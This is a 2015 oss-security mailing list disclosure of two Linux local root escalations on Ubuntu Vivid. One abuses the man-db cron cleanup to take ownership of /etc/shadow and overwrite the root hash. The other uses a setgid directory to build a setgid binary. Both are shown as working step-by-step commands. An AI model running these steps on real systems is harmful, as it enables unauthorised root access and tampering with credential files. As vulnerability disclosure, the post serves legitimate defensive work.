[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Sat, 19 Dec 2015 11:23:49 +0000
From: halfdog <me@...fdog.net>
To: oss-security@...ts.openwall.com
Subject: Re: User man Local Root Exploit/Linux Kernel setgid
Directory Privilege Escalation/PAM Owner Check Weakness
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Solar Designer wrote:
> halfdog -
>
>> http://www.halfdog.net/Security/2015/MandbSymlinkLocalRootPrivilegeEscalation/
>>
>>
http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/
>
> Thank you for documenting these peculiar findings. While your web
> pages are nicely formatted and have helpful cross-references, could
> you please post the actual content to oss-security directly? ...
Sorry, forgot that. I think you mentioned it already in some other
post on this list.
!!! Just for reference, please ignore !!!
The daily mandb cleanup job for old catman pages changes the
permissions of all non-man files to user man. This happens e.g. under
Ubuntu Vivid with /etc/cron.daily/man-db when systemd is not installed
(/run/systemd/system does not exist). The problematic code is
# expunge old catman pages which have not been read in a week
if [ ! -d /run/systemd/system ] && [ -d /var/cache/man ]; then
cd /
if ! dpkg-statoverride --list /var/cache/man >/dev/null 2>&1; then
echo "Running find" >&2
find /var/cache/man -ignore_readdir_race ! -user man -print0 | \
xargs -r0 chown -f man || true
fi
start-stop-daemon --start --pidfile /dev/null --startas /bin/sh \
--oknodo --chuid man $iosched_idle -- -c \
"find /var/cache/man -type f -name '*.gz' -atime +6 -print0 | \
xargs -r0 rm -f"
fi
With https://www.halfdog.net/Misc/Utils/DirModifyInotify.c this can be
used to change owenership of /etc/shadow and escalate to root. To
start, a hardlink to a file of a different user has to be created.
man# mkdir -p /var/cache/man/etc
man# ln /var/crash/.lock /var/cache/man/etc/shadow
man# ./DirModifyInotify --Watch /var/cache/man/etc --WatchCount 0
- --MovePath /var/cache/man/etc --LinkTarget /etc
... Wait till daily cronjob was run
man# cp /etc/shadow .
man# sed -r -e
's/^root:.*/root:$1$kKBXcycA$w.1NUJ77AuKcSYYrjLn9s1:15462:0:99999:7:::/'
/etc/shadow > x
man# cat x > /etc/shadow; rm x
man# su -s /bin/sh (password is 123)
root# cat shadow > /etc/shadow; chown root /etc/shadow
Read more at
http://www.halfdog.net/Security/2015/MandbSymlinkLocalRootPrivilegeEscalation/
On some Linux systems, directories with setgid bit set may be found,
e.g. using find / -type d -perm -02000. On Ubuntu Vivid this includes
drwxr-sr-x 25 man root 4096 May 15 00:40 /var/cache/man
Creating a file as user man/man with setgid-bit flags will produce a
file with setgit bit really set but uid man/root. Normal writes will
cause loss of setgid bit, but crafted writing allows to fill the file
and hence escalate privileges to group root:
man$ cd /var/cache/man
man$ wget -q
http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/CreateSetgidBinary.c
man$ gcc -o CreateSetgidBinary CreateSetgidBinary.c
man$ ./CreateSetgidBinary ./escalate /bin/mount x nonexistent-arg
man$ ls -al ./escalate
- -rwsrwsr-t 1 man root 155 May 15 02:12 ./escalate
man$ ./escalate /bin/sh
man$ ls -al /proc/self/
total 0
dr-xr-xr-x 9 man root 0 May 15 02:13 .
Read more at
http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/
- --
http://www.halfdog.net/
PGP: 156A AE98 B91F 0114 FE88 2BD8 C459 9386 feed a bee
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iEYEARECAAYFAlZ1PjoACgkQxFmThv7tq+6ouQCfZbKWiexcNN/iWNZb7Wc4Lhg1
vXQAn10Rx8RZVDVlSB4haUTQfsMlE3dv
=m9be
-----END PGP SIGNATURE-----
View attachment "CreateSetgidBinary.c" of type "text/x-csrc" (4289 bytes)
Powered by blists - more mailing lists
Please check out the
Open Source Software Security Wiki, which is counterpart to this
mailing list.
Confused about mailing lists and their use?
Read about mailing lists on Wikipedia
and check out these
guidelines on proper formatting of your messages.
